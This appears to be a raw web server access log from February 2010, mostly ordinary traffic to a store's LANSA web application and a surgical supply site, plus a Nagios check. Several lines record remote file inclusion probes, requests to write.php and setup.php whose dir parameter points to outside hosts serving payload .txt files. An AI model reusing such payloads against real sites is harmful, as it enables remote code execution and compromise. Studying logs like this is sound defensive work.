200.93.147.154 - - [23/Feb/2010:00:05:58 -0500] "GET /logs/access_log.Q110010100///include/write.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:00:05:58 -0500] "GET /logs/error_log.Q110010100///include/write.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
208.90.40.126 - - [23/Feb/2010:00:07:02 -0500] "GET /images/processcard.gif HTTP/1.1" 200 420 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233815F3356280019D307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:07:03 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LK233815A33F69800273307V+M37+ENG HTTP/1.1" 200 60167 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233815F3356280019D307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
76.240.55.226 - - [23/Feb/2010:00:07:06 -0500] "GET /zboard/skin/happycast//setup.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
76.240.55.226 - - [23/Feb/2010:00:07:06 -0500] "GET /logs/zboard/skin/happycast//setup.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
76.240.55.226 - - [23/Feb/2010:00:07:06 -0500] "GET /logs/access_log.Q109120600/zboard/skin/happycast//setup.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Feb/2010:00:07:18 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
71.96.139.25 - - [23/Feb/2010:00:07:22 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:22 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:23 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:23 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
